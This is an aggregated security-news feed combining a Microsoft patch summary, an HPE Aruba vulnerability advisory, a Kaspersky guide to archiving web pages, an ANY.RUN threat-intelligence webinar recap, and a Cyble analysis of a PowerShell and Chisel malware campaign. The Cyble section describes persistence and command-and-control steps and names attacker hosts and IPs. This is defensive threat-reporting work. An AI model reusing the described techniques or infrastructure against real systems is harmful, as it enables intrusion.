CVE-2024-49033 – Microsoft Word Security Feature Bypass Vulnerability
CVE-2024-43623 – Windows NT OS Kernel Elevation of Privilege Vulnerability
CVE-2024-43629 – Windows DWM Core Library Elevation of Privilege Vulnerability
CVE-2024-43630 – Windows Kernel Elevation of Privilege Vulnerability
CVE-2024-43636 – Win32k Elevation of Privilege Vulnerability
CVE-2024-49019 – Active Directory Certificate Services Elevation of Privilege VulnerabilityCisco Confidential
CVE-2024-43642 – Windows SMB Denial of Service Vulnerability
Additionally, Talos would like to highlight the following “important” vulnerabilities as exploitation has been detected by Microsoft:
CVE-2024-49039 – Windows Task Scheduler Elevation of Privilege Vulnerability
A complete list of all the other vulnerabilities Microsoft disclosed this month is available on its update page. In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Cisco Security Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.
The rules included in this release that protect against the exploitation of many of these vulnerabilities are 62022, 62023, 64218-64224, 64229, 64232 and 64233. There are also Snort 3 rules 301064, 300612, 301065, 301066 and 301073.
Hewlett Packard Enterprise (HPE) Aruba Networking has identified multiple critical security vulnerabilities affecting its Access Points running Instant AOS-8 and AOS-10.
The vulnerabilities, tracked under several CVEs including CVE-2024-42509 and CVE-2024-47460, could allow unauthenticated attackers to remotely execute commands on the device, potentially compromising the underlying operating system. HPE has issued patches to address these issues, and users are urged to upgrade as soon as possible.
These vulnerabilities impact widely deployed HPE Aruba Access Points and pose significant risks to network security, with certain devices remaining unpatched due to their end-of-maintenance (EoM) status.
CVE-2024-42509: Unauthenticated Command Injection via PAPI Protocol
Impact: Allows unauthenticated remote attackers to execute arbitrary commands as a privileged user via specially crafted packets sent to Aruba’s PAPI (UDP port 8211).
Severity: Critical (CVSS 9.8)
Mitigation: For Instant AOS-8, enabling cluster security via the cluster-security command can prevent exploitation. For AOS-10 devices, network administrators should block UDP/8211 from untrusted networks.
CVE-2024-47460: Command Injection via CLI Service through PAPI Protocol
Impact: Similar to CVE-2024-42509, this vulnerability allows command injection by sending packets to the PAPI protocol, leading to unauthorized command execution.
Severity: Critical (CVSS 9.0)
Mitigation: Enabling cluster security for Instant AOS-8 or restricting access to UDP/8211 for AOS-10.
Impact: An authenticated attacker could execute commands with elevated privileges on affected devices, compromising the underlying OS.
Severity: High (CVSS 7.2)
Mitigation: Restrict CLI and web-based management to a dedicated VLAN and firewall policies to limit access.
CVE-2024-47462 and CVE-2024-47463: Authenticated Arbitrary File Creation Leading to RCE
Impact: Authenticated attackers can create arbitrary files, potentially leading to remote code execution.
Severity: High (CVSS 7.2)
Mitigation: Limit access to the CLI and web-based management interfaces as described for CVE-2024-47461.
CVE-2024-47464: Authenticated Path Traversal
Impact: Allows attackers with valid credentials to copy arbitrary files to a readable location, leading to potential unauthorized access to sensitive files.
Severity: Medium (CVSS 6.8)
Mitigation: Restrict access to management interfaces to secure segments and implement firewall policies.
Mitigations and Recommendations
HPE Aruba has released patches for the impacted AOS-8 and AOS-10 versions to mitigate these vulnerabilities. Users should upgrade to the latest available versions immediately to secure their systems:
AOS-10.7.x.x: 10.7.0.0 and above
AOS-10.4.x.x: 10.4.1.5 and above
Instant AOS-8.12.x.x: 8.12.0.3 and above
Instant AOS-8.10.x.x: 8.10.0.14 and above
Additional Recommendations:
Enable Cluster Security: For AOS-8 devices, enabling cluster security via the cluster-security command can effectively mitigate certain command injection vulnerabilities.
Restrict Access to Management Ports: For AOS-10 devices, block PAPI protocol (UDP port 8211) from untrusted networks to limit potential attack vectors.
Network Segmentation: Segregate management interfaces on a dedicated VLAN and enforce strict access control policies using firewall rules.
Regular Monitoring: Conduct regular vulnerability assessments and monitor system logs for unusual activity.
Devices Not Receiving Patches
Some affected software versions have reached their end-of-maintenance (EoM) status and will not receive updates. This includes versions AOS-10.3.x.x and below, as well as Instant AOS-8.11.x.x and older.
For these devices, HPE recommends isolating them from untrusted networks or replacing them with supported models.
Conclusion
The critical vulnerabilities in HPE Aruba Networking’s Instant AOS-8 and AOS-10 software call for urgent patching. By promptly applying these updates and enforcing network access controls, organizations can significantly reduce the risk of unauthorized command execution and data breaches. For legacy devices beyond maintenance, adopting network isolation and considering device upgrades are key steps toward minimizing potential exposure.
Contrary to the popular belief that anything online stays online, the internet doesn’t remember everything. In a previous post in this series, we examined no fewer than nine scenarios in which you could lose access to online content. We also provided a detailed guide to what information you absolutely must (and preferably quickly) back up to your computer and how to do it. Today, we’ll discuss how to easily save web pages to your computer, how to organize these archives, and what to do if your favorite site has gone AWOL.
Let’s say you want to save a blog post with a recipe, compile a bibliography for your research paper, or even preserve a specific online publication for legal purposes. All of the above are published as web pages — which have a tendency to disappear at the wrong moment. Want to reminisce about music news and gossip from 2005? Good luck with that — the MTV News site shut down and all its articles and interviews are no longer available. Check references in Wikipedia articles? 11% of them lead nowhere, even though they were working when the article was published. This phenomenon of “link rot” — the gradual deletion or relocation of online content — is rapidly becoming a major problem. 38% of pages that existed ten years ago are no longer accessible today. So, if there’s a web page out there that you like or need, the wise move would be to create a backup.
How to save a web page to your computer
Since a web page consists of dozens or even hundreds of files, backing it up will require a bit of effort. Here are the main ways to do it:
Save only the text as an HTML file. Select the “Save page as…” menu command or button in your browser and then select “Webpage, HTML Only”. This will only save the text of the web page, without any graphics or other eye candy.
Save text and images. The “Webpage, Complete” option will create, besides an HTML file, a folder with the same name containing all graphic elements, styles, and scripts from the page. A downside of this option is that saving a lot of auxiliary files clutters your drive. The “Webpage, Single File” option is more convenient, bundling the web page and all its resources into a single .mhtml file. This will open freely in Chrome or Edge, but other browsers may have issues. This option is not available in all browsers, but if you install the SingleFile extension (available for most browsers), you can save the entire web page and its media content as a single HTML file that opens perfectly fine in all modern browsers.
Print to PDF. To preserve the main content of the page, but scrap menus and banners, your best option is Print to PDF. The resulting file will open on any computer.
With any of these options, make sure that the main text that you actually want to keep is still readable when you open the document.
An easier way to save a web page
The methods described above are a bit time-consuming and create clutter on your hard drive. For greater convenience, use a dedicated service such as Pocket (formerly Read It Later), wallabag, or Raindrop.io. They all work the same way: you send a link from which the service retrieves a document with all the illustrations, cleans the page of anything unnecessary, and saves it in your personal online storage. Even if the original page gets deleted or modified, the version you want will remain in your archive. These services allow you to group and sort your links, search for text inside, and view your saved pages on any device. For desktop, there’s an extension available for all the major browsers; and for mobile, there’s an app.
All these services offer an “eternal” archive only with a premium subscription, meaning you’ll have to pay for the convenience. That said, Wallabag is open-source — you can install it on your own server and not pay for third-party services or worry about the service getting shut down.
Some note-taking apps can also save complete web pages. These include Evernote, where the feature is called “Web Clipper”.
How to save a web page for others
If it’s not just a copy for yourself that you need, but to share a certain version of the page with others, you’ll need a public-archiving service.
The best-known is the Internet Archive (archive.org) and its Wayback Machine. Other options include archive.today (aka archive.is), perma.cc, and megalodon.jp. They all work on a similar principle: either at the user’s request or automatically they visit web pages and save a copy on their servers.
To request archiving of a web page, go to web.archive.org and enter the full address in the Save Page Now box. After you click Save, a window appears describing all of the page’s loaded components, followed by a permanent link to the site in its preserved state. It looks like this: https://web.archive.org/web/20240924045754/https://www.kaspersky.com/blog. The link shows both the address of the saved page and the exact time of saving — perfect for archival purposes.
Registering on archive.org lets you manage a collection of such links, take screenshots of saved sites, and download copies of them in the special web-archiving format.
On archive.org, you can view previously saved versions of websites and save the current state of any site — for example, our blog
On opening the archive link, you’ll see the saved page with a timestamp indicating when the snapshot was taken. This feature is useful for tracking and demonstrating changes in website data: price fluctuations, product description updates, edited news reports, and deleted information. The latter is particularly important for historical and cultural researchers based on defunct websites. Below, you can check out one of the first versions of GeoCities, a once popular web-hosting service that let you create “home pages”, express yourself, and find friends with shared interests long before social networks. It’s only thanks to the Wayback Machine that we can see it now — the site closed shop in 2016.
A gift for the old-timers: one of the earliest versions of GeoCities.com
How to find deleted internet content or an old version of a website
Enter the full address of the website or a specific page in the box next to the logo and click Enter. If the exact URL is unknown, you can enter the name of the website or words that describe it well.
Select the desired website from the list. The results show at a glance how many copies are archived and for what period.
Use the calendar to select which of the saved copies of the site you wish to view. Dates for which there is a saved copy are circled — the larger the circle, the more copies were made that day.
Click the desired date and inspect the saved site. Note that loading a copy from the archive may take a few minutes.
The calendar graph above the site copy lets you navigate to older and newer copies.
How to explore old versions of sites at web.archive.org
You can copy the link to the retrieved copy from the address bar to access the archived site directly, bypassing the search interface.
What if archive.org can’t help
The foundation behind archive.org sometimes complies with the requests of copyright holders and other authorized parties to exclude certain sites from the Wayback Machine. Also, the service never aimed to preserve the entire internet, so it may happen that the page you need was never indexed. In such cases, try looking for it in other time capsules.
Archive.today (aka archive.is) doesn’t automatically save pages — it does so only at the request of users. Among other things, this does away with having to follow instructions for search robots (robots.txt), and means that the archive contains documents that aren’t available in the Wayback Machine.
Another important web-archiving project is perma.cc, created by a consortium of major world libraries. However, it’s only free for participating organizations. Individual users can subscribe to a paid plan, with pricing based on the number of archived links.
A powerful alternative to specialized archives is search engines’ cached content. To index any web page, search engines retrieve its text, so a crude but readable version of almost any page can be found there. For a long time, Google’s cache was the most accessible, but in early 2024, the search giant removed the direct link to its cache from search results. The service still works, but accessing it directly is very difficult.
Therefore, it’s better to use browser extensions that make internet archives easier to work with. For example, if a link takes you to a deleted page or a defunct website, the Web Archives extension redirects you straight to an archived copy of this page at web.archive.org, archive.today, or perma.cc, or shows a cached version of it from Google, Bing, or Yandex.
How to save data from other online services
Besides web pages, there are many other online services — from photo albums and notes to social networks — that hold data you also may want to save. Of course, recommendations vary for different types of data and specific services, but for your convenience, we’ve grouped all related instructions under the backup tag. You can read about creating backups for:
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png2024-11-12 13:06:592024-11-12 13:06:59How to save web pages permanently or find content from deleted sites | Kaspersky official blog
On October 23, we hosted a webinar “How to Improve Threat Investigations with TI Lookup”. The session was led by Dmitry Marinov, CTO at ANY.RUN, who showed the audience effective methods for collecting the latest threat intelligence.
Here is a quick rundown of the main topics and examples of investigations covered during the event.
What is Threat Intelligence Lookup
Threat Intelligence (TI) Lookup is a centralized service for threat data exploration, collection, and analysis. It contains fresh threat data extracted from public malware and phishing samples uploaded to ANY.RUN’s Interactive Sandbox over the past 180 days. Each search request you make returns results that provide expanded context related to the threat data in your query.
Key features of TI Lookup include:
Search results take just 5 seconds for events spanning the last six months. You can quickly get in-depth information about how events work, whether they are linked to a threat, and how they are related to that threat.
With over 40 search parameters, TI Lookup provides examples and context from other investigations to help with decision-making. Unlike other solutions where you can work only with IOCs, Lookup can search among events and YARA rules, which is extremely helpful.
TI Lookup has a large amount of data from the ANY.RUN sandbox, where cybersecurity analysts from around the world analyze threats. New samples are uploaded and analyzed daily, providing data that you cannot find in any other open sources.
How TI Lookup Sources Data
A core component of the suite is the Public submissions database. It is a vast repository that houses millions of unique malware and phishing samples submitted daily by a global community of over 500,000 security professionals from different spheres and industries using ANY.RUN.
Every time a user runs a public analysis in the sandbox, the systems capture the key data from that analysis. This data is then immediately sent to Threat Intelligence Lookup. As a result, Threat Intelligence Lookup becomes a centralized hub where you can search through threat data extracted from millions of malware and phishing analysis sessions launched in the ANY.RUN sandbox.
Collect threat intel on the latest malware and phishing campaigns with TI Lookup
The first part of the query, threatName:”lumma”, instructs the search engine to find sandbox sessions where Lumma was detected.
The second part of the query, domainName:””, tells the system to retrieve all domain names identified in those sandbox sessions. The empty field essentially acts as a wildcard, indicating that you are interested in all domain names associated with the threat.
The service returns numerous domains that match our request. At the top, you can see domains with the malconf tag, which tells you that these domains were extracted directly from the configs of Lumma samples, the most reliable source of indicators of compromise. We can easily copy each indicator or download all of them in JSON format.
As you can see, apart from domains, the service also provides a large number of other types of indicators, including events, files, URLs, and others. That’s one of TI Lookup’s unique advantages – the diversity of data it provides.
Use Cases of TI Lookup
To demonstrate how TI Lookup can be used in real-world investigations, Dmitry outlined several use cases where the service can be particularly useful.
Checking a Suspicious IP Address
One of the most straightforward use cases is identifying threats using a suspicious IP address. For example, if you receive an alert about a connection to a suspicious IP address (e.g., 162.254.34.31) coming from one of the machines on your network, TI Lookup can quickly check if this IP address has been used in other malware attacks.
The service marks the queried IP address as malicious and offers extra context
TI Lookup provides a list of sandbox sessions where the IP address was detected
It also provides related indicators, including processes, files, and most importantly, sandbox sessions where you can see the analysis of actual attacks and collect more data.
Identifying a Malware Family Using a Mutex
Another way to use TI Lookup is to identify a threat by using unique indicators such as mutexes. For instance, you can use mutexes to identify the Remcos malware.
Synchronization events found in TI Lookup’s database with corresponding sandbox sessions
By entering the query syncObjectName:”RMC-“, the service shows specific mutexes and provides a list of sandbox sessions to explore the threat further.
Learn to Track Emerging Cyber Threats
Check out expert guide to collecting intelligence on emerging threats with TI Lookup
Read full guide
Uncovering a Threat Using a File Path
You can also find threats using a file path.
The service provides a list of files that match the query and events with the tag “darkvision”
The service also returns Suricata IDS rules triggered in relation to the requested files’ activity
This allows you to see the context and related sandbox sessions for further investigation.
Connecting Unrelated Data Points
One of the most powerful features of TI Lookup is its ability to connect pieces of data that may seem unrelated. Consider a scenario where you have a command line artifact and a network artifact.
The command line artifact might be commandLine:”timeout /t 5 & del”, which indicates a command that delays execution for 5 seconds and then deletes a file. The network artifact might be destinationIP:”185.215.113.37″, which represents an IP address that the system is communicating with.
TI Lookup generates relevant results, offering instant threat context
The service provides plenty of context and shows that the malware in question is StealC. Some of the additional indicators provided include malicious IPs and URLs, which were used in StealC attacks.
You can always go back to the source by navigating to a sandbox session of your interest to observe the threat’s behavior, and even rerun the analysis using your own VM settings.
Collecting Fresh Samples with YARA Rules
Another handy feature of TI Lookup is YARA Search. Thanks to the built-in editor, you can create, edit, store, and use YARA rules to find samples that match them.
The YARA rule search TI Lookup’s database for matching samples
For example, using a YARA rule for AgentTesla, which is available by default in TI Lookup, the search returns numerous files that can be filtered by date. You can explore each result in detail by clicking on them and navigating to the sandbox session where it was detected.
You can also download a JSON file containing file hashes along with links to corresponding sandbox sessions.
Conclusion
The webinar gave a detailed look at TI Lookup, showing how it can help improve threat investigations. The tool’s ability to provide fast results, offer a wide range of search options, and give access to real samples and the latest data makes it very useful for cybersecurity professionals.
Stay tuned for more webinars from ANY.RUN by following us on social media like X, Facebook, and Discord. Subscribe to ANY.RUN’s YouTube channel for the upcoming release of a video recording of the webinar.
About ANY.RUN
ANY.RUN helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, YARA Search and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.
With ANY.RUN you can:
Detect malware in seconds
Interact with samples in real time
Save time and money on sandbox setup and maintenance
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png2024-11-12 11:07:132024-11-12 11:07:13How to Improve Threat Investigations with TI Lookup: Webinar Recap
Cyble Research and Intelligence Lab (CRIL) has identified a sophisticated campaign employing PowerShell in a multi-stage infection process.
The attack initiates with a suspicious LNK file, which activates a PowerShell script designed to download and execute malicious payloads. This layered strategy enhances stealth, evades detection, and ensures prolonged persistence within the target system.
In the first stage, the LNK file runs an initial remote obfuscated PowerShell script that establishes persistence by deploying and executing a secondary PowerShell script and batch files.
The second-stage PowerShell script continues communication with the command-and-control (C&C) server and executes a third-stage PowerShell script.
The third and final stage PowerShell script sends requests for command chains and includes routines to execute received commands as directed by the C&C server.
An analysis of the Network infrastructure reveals the presence of a Chisel DLL, suggesting the Threat Actor (TA) may leverage the Chisel client for further C&C communications and to enable lateral movement operations within the compromised network.
The TA also likely utilizes the Netskope proxy for command and control (C&C) communication with the Chisel server.
Executive Summary
CRIL has recently identified a campaign engaging in a multi-stage infection chain. This chain employs several techniques, starting with the execution of PowerShell scripts. The campaign begins with a malicious LNK file that triggers the execution of a first-stage remote PowerShell script. This script aims to establish persistence on the victim’s system by dropping and running a second-stage PowerShell script. The second-stage script maintains communication with the C&C server, allowing it to download and execute an additional third-stage PowerShell script.
The third-stage script continuously interacts with the C&C server to receive command chains. It executes these commands based on the instructions provided, enabling a variety of malicious activities, such as data exfiltration or lateral movement. The presence of a Chisel DLL on the remote server suggests that the TA may utilize Chisel for advanced operations, including setting up a SOCKS proxy and facilitating lateral movement within the infected network, further strengthening their foothold and enabling stealthy communications.
Technical details:
The infection chain begins when the user inadvertently executes a malicious LNK (shortcut) file. However, the initial infection vector of the LNK file remains unidentified. This LNK file is crafted to run a PowerShell command, which downloads another Base64 encoded PowerShell command from the remote server and then executes it.
The Powershell command uses techniques to bypass Windows security mechanisms, such as setting the PowerShell execution policy to “Bypass,” which allows the script to run without restrictions typically enforced by the system’s security settings. Additionally, the PowerShell window is executed in hidden mode, ensuring that the user does not see any visual indicators of the malicious activity. Following is the PowerShell command:
The figure below shows the property of the shortcut file.
Figure 1 – Malicious Shortcut File
The figure below displays the Base64-encoded PowerShell script, highlighting the sophisticated methods used to conceal its true functionality.
Figure 2 – Base64 Encoded PowerShell Script
This de-obfuscated PowerShell script is a sophisticated piece of code engineered to establish persistence and download a PowerShell script from the C&C server. It employs various obfuscation techniques to evade detection and execute its malicious activities stealthily. The figure below shows the de-obfuscated PowerShell script.
In the First Stage, the PowerShell Script performs the following tasks
Initially, the PowerShell script creates a Hidden directory at “C:UsersMalWorkstationAppDataRoamingMicrosoftLogs” and sets the variable “$HASH” with a seemingly random string, “bdhbzaibdiBKJBJIBDI67869686806656..”. While the exact purpose of this variable is unclear, it could be a placeholder for future use.
To ensure secure communications, the PowerShell script configures the security protocol to TLS 1.2
It then retrieves the system’s hostname with the “hostname” command and proceeds to obfuscate this information, converting it to a Base64-encoded string
This command attempts to retrieve the proxy settings for the specified URL, “hxxp://google.es/,” and constructs the authorization header, appending Base64-encoded hostname.
If a proxy is configured on the victim’s machine, it uses the proxy to send a request to “hxxps://c2.innov-eula.com/” with the constructed Authorization header. If no proxy is configured, it sends the same request directly without using a proxy.
The response from the request is stored in the $R variable, which contains a PowerShell script. This script is then saved in the “Logs” folder with the filename “Log_29109314.ps1.” and then executed subsequently.
The PowerShell script creates two batch files, “Log_29109317.bat” and “Log_29109318.bat,” in the Logs folder. The “Log_29109317.bat” file runs the “Log_29109314.ps1” script, while the “Log_29109318.bat” file moves “Log_29109317.bat” to the startup folder for persistence.
The figure below shows the content of the Logs Folder.
Figure 4 – Contents of the Folder
Second Stage PowerShell Script
The second-stage PowerShell script operates similarly to the first one, establishing a connection to the C&C server using the proxies. Once connected, it retrieves the next stage of the attack, which is a PowerShell script encoded in Base64. The script then decodes and executes this Base64-encoded PowerShell script, continuing the attack chain. The figure below shows the contents of the second-stage PowerShell script.
Figure 5 – De-obfuscated Second Stage PowerShell Script
Third Stage PowerShell Script
In the Third Stage, the PowerShell Script performs the following tasks
The PowerShell script initializes critical variables like “$CHAIN” and “$JITTER” to control its operation. The “$CHAIN” variable tracks the current status of the communication with the Command and Control (C&C) server, while “$JITTER” introduces random delays at various stages to avoid detection by security systems.
The script then retrieves and encodes the infected machine’s hostname in Base64 and uses it to construct a web request for the system’s proxy settings via “hxxp://google.es/”.
If “$CHAIN” is “0”, it prepares an Authorization header with the hostname and retrieves data from “hxxps://c2.innov-eula.com/”, using proxy settings if needed. The response is stored in “$CHAIN” to establish communication with the remote server.
Next, the PowerShell script checks if “$CHAIN” contains invalid characters. If it does, it resets “$CHAIN” to “0” and introduces a random delay. Otherwise, it prepares an Authorization header with “$CHAIN” and hostname and sends a request to “hxxps://c2.innov-eula.com/”.
The server’s response is split and stored in “$CMD”. If the command is not “WAIT,” it executes a PowerShell command encoded in “$CMD[1]”. The response is then processed and split into chunks, which are sent back to the server in multiple requests.
The process continues, handling each chunk until the “END” command is received. The PowerShell script is shown below.
The figure below shows the de-obfuscated third-stage PowerShell script.
Figure 6 – De-obfuscated Third Stage PowerShell Script
Open Directory
At the time of execution, we were not able to observe any commands from the C&C server. However, after checking for the network infrastructure, we came across an open directory, “hxxps:/credit-agricole.webdev.innov-eula[.]com”, hosting the malicious LNK file along with other files as shown in the figure below.
Figure 7 – Open Directory
Chisel
The open directory contains a suspicious file named chisolo.dll, which is identified as Chisel—a fast TCP/UDP tunneling tool written in Go. Chisel operates over HTTP and is secured via SSH. It uses a single executable for both the client and server, making it particularly effective for bypassing firewalls.
Chisel has been widely adopted by various threat actors as a powerful tunneling tool, enabling them to pivot into compromised environments with stealth and efficiency. Notable groups such as Sandworm APT, Lorenz Ransomware, and Pysa Ransomware have leveraged Chisel in their campaigns to facilitate lateral movement and maintain persistence.
The Threat Actor can leverage the Chisel tool for various malicious purposes.
Scanning the Internal Network
After compromising the system using the previously mentioned infection, the TA deploys and executes the Chisel client on the compromised machine. This allows the TA to use the infected machine as a SOCKS proxy, enabling them to scan the internal network with tools like Nmap.
Accessing Protected Internal Networks
Once the internal networks are identified, the TA can use the compromised machine to create a tunnel using the Chisel client. This tunnel provides access to networks that are otherwise shielded from external connections, allowing the TA to infiltrate internal systems not exposed to the outside.
Enabling External Connections for Isolated Machines
The TA can also leverage the Chisel client to enable internet access for machines that are otherwise unable to connect. This allows the TA to download additional malicious samples for further exploitation and maintain persistence within the network.
The chisel client sample identified in this campaign has three export functions, as shown below.
Figure 8 – Chisel Client Export Functions
The export functions main and xlAutoOpen have code to start the Chisel client on the infected machine, as shown below.
Figure 9 – Routine to Start Chisel Client
Interestingly, the Threat Actor (TA) is using the IP address 163.116.128[.]80 over port 8080, associated with Netskope, as an explicit proxy. By routing their traffic through this Netskope proxy, we suspect that the TA is likely using this to obfuscate their communications with the C&C server – hxxps://ligolo.innov-eula[.]com.
This approach allows them to bypass traditional network defenses and evade detection, making it difficult for security teams to identify and block malicious C&C traffic. The figure below shows a code snippet used by the Chisel client containing a proxy IP address and C&C URL.
Figure 10 – Chisel Client C&C Routine
Although direct commands from the C&C server were not observed, the TA likely uses the C&C to issue commands to download and execute the Chisel client on the compromised machine. Once the Chisel tunnel is established between the C&C server and the victim’s machine, this tunnel enables the TA to control the compromised system more effectively. Through this channel, the TA can send specific commands to identify the internal network, move laterally across connected systems, and download additional malicious payloads. These actions enhance the TA’s control and facilitate further malicious activities within the internal environment. The setup effectively provides the TA with a hidden and flexible pathway into internal systems that would otherwise be isolated from external access.
Threat hunting Packages
Our exclusive threat-hunting packages, which include YARA and Sigma rules specifically designed to detect campaigns involving the Chisel tool and related malicious activities.
Additionally, our threat-hunting packages empower organizations to proactively identify and mitigate cyber threats, enabling them to stay ahead of cybercriminals. These packages help detect potential risks and malicious activities before they can cause harm, ensuring a stronger defense against evolving cyber threats.
We have over 15,000 threat-hunting packages and growing. To learn more about how you can gain access to our latest actionable threat intel, click here.
Conclusion
This sophisticated multi-stage PowerShell campaign uses an LNK file to activate a sequence of obfuscated scripts, which maintain persistence and ensure stealth by connecting with a command-and-control (C&C) server. The attack involves Chisel and a Netskope proxy for covert communication, enabling lateral movement within the network. This setup reflects advanced threat actor tactics aimed at prolonged control and evasion, suggesting a highly organized or financially motivated campaign.
Recommendations
Deploy endpoint detection and response (EDR) solutions that can identify and stop unusual PowerShell activity. Ensure that all endpoints are configured to log PowerShell command executions and unusual file behaviors, such as LNK file executions from non-standard locations.
Limit access to PowerShell and other scripting tools based on user roles. Where possible, apply “constrained language mode” to restrict the types of commands that can be executed.
Monitor network traffic for unusual connections, particularly those using uncommon ports or protocols (such as Chisel’s tunneling). Network segmentation can limit lateral movement, restricting an attacker’s access even if they compromise one segment.
Train users to recognize and avoid suspicious links or files, particularly those delivered via email or other messaging platforms. Regular phishing simulations and awareness training can help prevent the initial compromise.
Implement MFA on all sensitive systems. It can help prevent unauthorized access, even if credentials are compromised. This is especially important for privileged accounts that can execute PowerShell or access sensitive segments of the network.
Integrate threat intelligence feeds that include indicators of compromise (IOCs) related to C&C servers, known malicious IP addresses, and techniques like Chisel tunneling. This intelligence can aid in detecting and blocking attacks that match these patterns.
